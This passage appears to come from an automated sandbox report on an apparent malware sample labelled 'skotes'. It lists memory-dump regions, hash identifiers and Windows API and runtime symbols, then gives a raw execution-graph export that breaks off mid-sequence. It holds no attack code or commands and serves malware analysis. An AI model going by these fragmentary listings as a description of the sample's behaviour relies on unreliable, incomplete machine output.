                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF03A36501128ABCF125F40EC048EE7F67EF08761B054050FE155A230C7329C61EFE0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 006BB94E
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006BB961
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                          • API String ID: 548886458-2046700901
                                                                                                                                                                                                                                          • Opcode ID: e282a7295c18bb11bef20c6f5d683b06441ae5efef436d72381991ebf59ae18a
                                                                                                                                                                                                                                          • Instruction ID: 53afbe4347e13dfcd48c267aca0a0f8e5aac5d4e8786d196d1ce7efdce4ab8f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e282a7295c18bb11bef20c6f5d683b06441ae5efef436d72381991ebf59ae18a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE06839B003046BCB00F765D889CADB7BB9EC2B20701801DE611E7381EBB0EE00CAD4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006B34FC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: std::invalid_argument::invalid_argument
• String ID: pScheduler$version
• API String ID: 2141394445-3154422776
• Opcode ID: 2768d0397f3e57f422872a8ccb9d8ac8446359e98a221ef2cf8589b420e013ac
• Instruction ID: a4eba000d5f5d8d3ebbaaf57d393bbffd4f7b7f94957fae29ee91aafac1c306c
• Opcode Fuzzy Hash: 2768d0397f3e57f422872a8ccb9d8ac8446359e98a221ef2cf8589b420e013ac
• Instruction Fuzzy Hash: D8E02670540348B6CB25FA11C847ADD77AA9B11304F00C019B800112918BB197C8DB81

Execution Graph

Execution Coverage: 9.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 41
[Execution graph not reproduced: the interactive graph was exported here as a raw sequence of node IDs, function addresses in the 0x7ff67aed0000 image range and node-to-node edges, which does not render as text. The only information recoverable from the export is the set of labels on the nodes.]

Windows API calls named on graph nodes: IsProcessorFeaturePresent, GetModuleHandleW, GetModuleFileNameW, GetStartupInfoW, SetDllDirectoryW, LoadLibraryExW, GetProcAddress, FreeLibrary, GetLastError, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, EnterCriticalSection, DeleteCriticalSection, TlsFree, FindFirstFileExW, FindClose, CreateFileW, GetFinalPathNameByHandleW, CloseHandle, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, GetCurrentProcess, GetCurrentProcessId, OpenProcessToken, LocalFree, MultiByteToWideChar, WideCharToMultiByte, FormatMessageW, MessageBoxW, PostMessageW, GetMessageW.

CRT and runtime symbols named on graph nodes: __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_dllmain_crt_thread_attach, __vcrt_InitializeCriticalSectionEx, __vcrt_freefls, __GetCurrentState, _invalid_parameter_noinfo, _fread_nolock, _log10_special, __free_lconv_mon, memcpy_s.
16758->16759 16759->16774 16854 7ff67aee21d4 16759->16854 16763->16774 16826 7ff67aee4504 16763->16826 16765->16746 16766 7ff67aee3ae2 16765->16766 16766->16774 16832 7ff67aee45c8 16766->16832 16768 7ff67aedc5c0 _log10_special 8 API calls 16770 7ff67aee3e5a 16768->16770 16770->16739 16771->16774 16775 7ff67aee3d4c 16771->16775 16861 7ff67aee4830 16771->16861 16774->16768 16775->16774 16867 7ff67aeeea78 16775->16867 16777 7ff67aee3484 16776->16777 16778 7ff67aee346e 16776->16778 16781 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16777->16781 16782 7ff67aee34c4 16777->16782 16779 7ff67aee3ac7 16778->16779 16780 7ff67aee3a56 16778->16780 16778->16782 16785 7ff67aee3b20 16779->16785 16786 7ff67aee3acc 16779->16786 16783 7ff67aee3af1 16780->16783 16784 7ff67aee3a5c 16780->16784 16781->16782 16782->16739 16791 7ff67aee1dc4 38 API calls 16783->16791 16787 7ff67aee3a61 16784->16787 16788 7ff67aee3a90 16784->16788 16792 7ff67aee3b37 16785->16792 16795 7ff67aee3b2a 16785->16795 16798 7ff67aee3b2f 16785->16798 16789 7ff67aee3ace 16786->16789 16790 7ff67aee3b01 16786->16790 16787->16792 16793 7ff67aee3a67 16787->16793 16788->16793 16788->16798 16794 7ff67aee3a70 16789->16794 16802 7ff67aee3add 16789->16802 16796 7ff67aee19b4 38 API calls 16790->16796 16808 7ff67aee3a8b 16791->16808 16799 7ff67aee471c 45 API calls 16792->16799 16793->16794 16800 7ff67aee3aa2 16793->16800 16793->16808 16797 7ff67aee41c8 47 API calls 16794->16797 16811 7ff67aee3b60 16794->16811 16795->16783 16795->16798 16796->16808 16797->16808 16801 7ff67aee21d4 38 API calls 16798->16801 16798->16811 16799->16808 16804 7ff67aee4504 46 API calls 16800->16804 16800->16811 16801->16808 16802->16783 16803 7ff67aee3ae2 16802->16803 16806 7ff67aee45c8 37 API calls 16803->16806 16803->16811 16804->16808 16805 7ff67aedc5c0 _log10_special 8 API calls 16807 7ff67aee3e5a 16805->16807 16806->16808 16807->16739 16809 7ff67aee4830 45 API calls 16808->16809 16808->16811 16812 7ff67aee3d4c 16808->16812 16809->16812 
16810 7ff67aeeea78 46 API calls 16810->16812 16811->16805 16812->16810 16812->16811 17061 7ff67aee1038 16813->17061 16817 7ff67aee41ee 16816->16817 16879 7ff67aee0bf0 16817->16879 16822 7ff67aee4333 16824 7ff67aee4830 45 API calls 16822->16824 16825 7ff67aee43c1 16822->16825 16823 7ff67aee4830 45 API calls 16823->16822 16824->16825 16825->16771 16828 7ff67aee4539 16826->16828 16827 7ff67aee457e 16827->16771 16828->16827 16829 7ff67aee4557 16828->16829 16830 7ff67aee4830 45 API calls 16828->16830 16831 7ff67aeeea78 46 API calls 16829->16831 16830->16829 16831->16827 16835 7ff67aee45e9 16832->16835 16833 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16834 7ff67aee461a 16833->16834 16834->16771 16835->16833 16835->16834 16837 7ff67aee1df7 16836->16837 16838 7ff67aee1e26 16837->16838 16840 7ff67aee1ee3 16837->16840 16842 7ff67aee1e63 16838->16842 17015 7ff67aee0c98 16838->17015 16841 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16840->16841 16841->16842 16842->16771 16844 7ff67aee19e7 16843->16844 16845 7ff67aee1a16 16844->16845 16847 7ff67aee1ad3 16844->16847 16846 7ff67aee0c98 12 API calls 16845->16846 16849 7ff67aee1a53 16845->16849 16846->16849 16848 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16847->16848 16848->16849 16849->16771 16851 7ff67aee475f 16850->16851 16852 7ff67aee4763 __crtLCMapStringW 16851->16852 17023 7ff67aee47b8 16851->17023 16852->16771 16855 7ff67aee2207 16854->16855 16856 7ff67aee2236 16855->16856 16858 7ff67aee22f3 16855->16858 16857 7ff67aee0c98 12 API calls 16856->16857 16860 7ff67aee2273 16856->16860 16857->16860 16859 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16858->16859 16859->16860 16860->16771 16862 7ff67aee4847 16861->16862 17027 7ff67aeeda28 16862->17027 16868 7ff67aeeeaa9 16867->16868 16877 7ff67aeeeab7 16867->16877 16869 7ff67aeeead7 16868->16869 16872 7ff67aee4830 45 API calls 16868->16872 16868->16877 16870 7ff67aeeeb0f 16869->16870 16871 7ff67aeeeae8 16869->16871 16874 7ff67aeeeb9a 16870->16874 
16875 7ff67aeeeb39 16870->16875 16870->16877 17051 7ff67aef0110 16871->17051 16872->16869 16876 7ff67aeef910 _fread_nolock MultiByteToWideChar 16874->16876 16875->16877 17054 7ff67aeef910 16875->17054 16876->16877 16877->16775 16880 7ff67aee0c16 16879->16880 16881 7ff67aee0c27 16879->16881 16887 7ff67aeee5e0 16880->16887 16881->16880 16882 7ff67aeed66c _fread_nolock 12 API calls 16881->16882 16883 7ff67aee0c54 16882->16883 16884 7ff67aee0c68 16883->16884 16886 7ff67aeea9b8 __free_lconv_mon 11 API calls 16883->16886 16885 7ff67aeea9b8 __free_lconv_mon 11 API calls 16884->16885 16885->16880 16886->16884 16888 7ff67aeee630 16887->16888 16889 7ff67aeee5fd 16887->16889 16888->16889 16891 7ff67aeee662 16888->16891 16890 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16889->16890 16900 7ff67aee4311 16890->16900 16897 7ff67aeee775 16891->16897 16902 7ff67aeee6aa 16891->16902 16892 7ff67aeee867 16942 7ff67aeedacc 16892->16942 16894 7ff67aeee82d 16935 7ff67aeede64 16894->16935 16896 7ff67aeee7fc 16928 7ff67aeee144 16896->16928 16897->16892 16897->16894 16897->16896 16899 7ff67aeee7bf 16897->16899 16901 7ff67aeee7b5 16897->16901 16918 7ff67aeee374 16899->16918 16900->16822 16900->16823 16901->16894 16904 7ff67aeee7ba 16901->16904 16902->16900 16909 7ff67aeea514 16902->16909 16904->16896 16904->16899 16907 7ff67aeea970 _isindst 17 API calls 16908 7ff67aeee8c4 16907->16908 16910 7ff67aeea521 16909->16910 16911 7ff67aeea52b 16909->16911 16910->16911 16916 7ff67aeea546 16910->16916 16912 7ff67aee4f78 memcpy_s 11 API calls 16911->16912 16913 7ff67aeea532 16912->16913 16914 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 16913->16914 16915 7ff67aeea53e 16914->16915 16915->16900 16915->16907 16916->16915 16917 7ff67aee4f78 memcpy_s 11 API calls 16916->16917 16917->16913 16951 7ff67aef411c 16918->16951 16922 7ff67aeee41c 16923 7ff67aeee471 16922->16923 16924 7ff67aeee420 16922->16924 16925 7ff67aeee43c 16922->16925 17004 7ff67aeedf60 16923->17004 16924->16900 17000 
7ff67aeee21c 16925->17000 16929 7ff67aef411c 38 API calls 16928->16929 16930 7ff67aeee18e 16929->16930 16931 7ff67aef3b64 37 API calls 16930->16931 16932 7ff67aeee1de 16931->16932 16933 7ff67aeee1e2 16932->16933 16934 7ff67aeee21c 45 API calls 16932->16934 16933->16900 16934->16933 16936 7ff67aef411c 38 API calls 16935->16936 16937 7ff67aeedeaf 16936->16937 16938 7ff67aef3b64 37 API calls 16937->16938 16939 7ff67aeedf07 16938->16939 16940 7ff67aeedf0b 16939->16940 16941 7ff67aeedf60 45 API calls 16939->16941 16940->16900 16941->16940 16943 7ff67aeedb44 16942->16943 16944 7ff67aeedb11 16942->16944 16945 7ff67aeedb5c 16943->16945 16948 7ff67aeedbdd 16943->16948 16946 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16944->16946 16947 7ff67aeede64 46 API calls 16945->16947 16950 7ff67aeedb3d memcpy_s 16946->16950 16947->16950 16949 7ff67aee4830 45 API calls 16948->16949 16948->16950 16949->16950 16950->16900 16952 7ff67aef416f fegetenv 16951->16952 16953 7ff67aef7e9c 37 API calls 16952->16953 16956 7ff67aef41c2 16953->16956 16954 7ff67aef42b2 16957 7ff67aef7e9c 37 API calls 16954->16957 16955 7ff67aef41ef 16959 7ff67aeea514 __std_exception_copy 37 API calls 16955->16959 16956->16954 16960 7ff67aef428c 16956->16960 16961 7ff67aef41dd 16956->16961 16958 7ff67aef42dc 16957->16958 16962 7ff67aef7e9c 37 API calls 16958->16962 16963 7ff67aef426d 16959->16963 16964 7ff67aeea514 __std_exception_copy 37 API calls 16960->16964 16961->16954 16961->16955 16965 7ff67aef42ed 16962->16965 16966 7ff67aef5394 16963->16966 16971 7ff67aef4275 16963->16971 16964->16963 16968 7ff67aef8090 20 API calls 16965->16968 16967 7ff67aeea970 _isindst 17 API calls 16966->16967 16969 7ff67aef53a9 16967->16969 16979 7ff67aef4356 memcpy_s 16968->16979 16970 7ff67aedc5c0 _log10_special 8 API calls 16972 7ff67aeee3c1 16970->16972 16971->16970 16996 7ff67aef3b64 16972->16996 16973 7ff67aef46ff memcpy_s 16974 7ff67aef4a3f 16975 7ff67aef3c80 37 API calls 16974->16975 16977 7ff67aef5157 16975->16977 
16976 7ff67aef4397 memcpy_s 16988 7ff67aef47f3 memcpy_s 16976->16988 16991 7ff67aef4cdb memcpy_s 16976->16991 16985 7ff67aef53ac memcpy_s 37 API calls 16977->16985 16995 7ff67aef51b2 16977->16995 16978 7ff67aef49eb 16978->16974 16978->16978 16980 7ff67aef53ac memcpy_s 37 API calls 16978->16980 16979->16973 16979->16976 16981 7ff67aee4f78 memcpy_s 11 API calls 16979->16981 16980->16974 16983 7ff67aef47d0 16981->16983 16982 7ff67aef5338 16987 7ff67aef7e9c 37 API calls 16982->16987 16984 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 16983->16984 16984->16976 16985->16995 16986 7ff67aee4f78 11 API calls memcpy_s 16986->16991 16987->16971 16988->16978 16989 7ff67aee4f78 11 API calls memcpy_s 16988->16989 16993 7ff67aeea950 37 API calls _invalid_parameter_noinfo 16988->16993 16989->16988 16990 7ff67aeea950 37 API calls _invalid_parameter_noinfo 16990->16991 16991->16974 16991->16978 16991->16986 16991->16990 16992 7ff67aef3c80 37 API calls 16992->16995 16993->16988 16994 7ff67aef53ac memcpy_s 37 API calls 16994->16995 16995->16982 16995->16992 16995->16994 16997 7ff67aef3b83 16996->16997 16998 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 16997->16998 16999 7ff67aef3bae memcpy_s 16997->16999 16998->16999 16999->16922 17001 7ff67aeee248 memcpy_s 17000->17001 17002 7ff67aee4830 45 API calls 17001->17002 17003 7ff67aeee302 memcpy_s 17001->17003 17002->17003 17003->16924 17005 7ff67aeedf9b 17004->17005 17008 7ff67aeedfe8 memcpy_s 17004->17008 17006 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17005->17006 17007 7ff67aeedfc7 17006->17007 17007->16924 17008->17008 17009 7ff67aeee053 17008->17009 17011 7ff67aee4830 45 API calls 17008->17011 17010 7ff67aeea514 __std_exception_copy 37 API calls 17009->17010 17014 7ff67aeee095 memcpy_s 17010->17014 17011->17009 17012 7ff67aeea970 _isindst 17 API calls 17013 7ff67aeee140 17012->17013 17014->17012 17016 7ff67aee0cbe 17015->17016 17017 7ff67aee0ccf 17015->17017 17016->16842 17017->17016 17018 7ff67aeed66c 
_fread_nolock 12 API calls 17017->17018 17019 7ff67aee0d00 17018->17019 17020 7ff67aee0d14 17019->17020 17021 7ff67aeea9b8 __free_lconv_mon 11 API calls 17019->17021 17022 7ff67aeea9b8 __free_lconv_mon 11 API calls 17020->17022 17021->17020 17022->17016 17024 7ff67aee47d6 17023->17024 17026 7ff67aee47de 17023->17026 17025 7ff67aee4830 45 API calls 17024->17025 17025->17026 17026->16852 17028 7ff67aeeda41 17027->17028 17029 7ff67aee486f 17027->17029 17028->17029 17035 7ff67aef3374 17028->17035 17031 7ff67aeeda94 17029->17031 17032 7ff67aee487f 17031->17032 17033 7ff67aeedaad 17031->17033 17032->16775 17033->17032 17048 7ff67aef26c0 17033->17048 17036 7ff67aeeb1c0 __GetCurrentState 45 API calls 17035->17036 17037 7ff67aef3383 17036->17037 17038 7ff67aef33ce 17037->17038 17047 7ff67aef0348 EnterCriticalSection 17037->17047 17038->17029 17049 7ff67aeeb1c0 __GetCurrentState 45 API calls 17048->17049 17050 7ff67aef26c9 17049->17050 17057 7ff67aef6df8 17051->17057 17056 7ff67aeef919 MultiByteToWideChar 17054->17056 17060 7ff67aef6e5c 17057->17060 17058 7ff67aedc5c0 _log10_special 8 API calls 17059 7ff67aef012d 17058->17059 17059->16877 17060->17058 17062 7ff67aee107f 17061->17062 17063 7ff67aee106d 17061->17063 17066 7ff67aee108d 17062->17066 17069 7ff67aee10c9 17062->17069 17064 7ff67aee4f78 memcpy_s 11 API calls 17063->17064 17065 7ff67aee1072 17064->17065 17067 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17065->17067 17068 7ff67aeea884 _invalid_parameter_noinfo 37 API calls 17066->17068 17077 7ff67aee107d 17067->17077 17068->17077 17070 7ff67aee1445 17069->17070 17072 7ff67aee4f78 memcpy_s 11 API calls 17069->17072 17071 7ff67aee4f78 memcpy_s 11 API calls 17070->17071 17070->17077 17073 7ff67aee16d9 17071->17073 17074 7ff67aee143a 17072->17074 17075 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17073->17075 17076 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 17074->17076 17075->17077 17076->17070 17077->16739 17079 7ff67aee0774 17078->17079 17106 
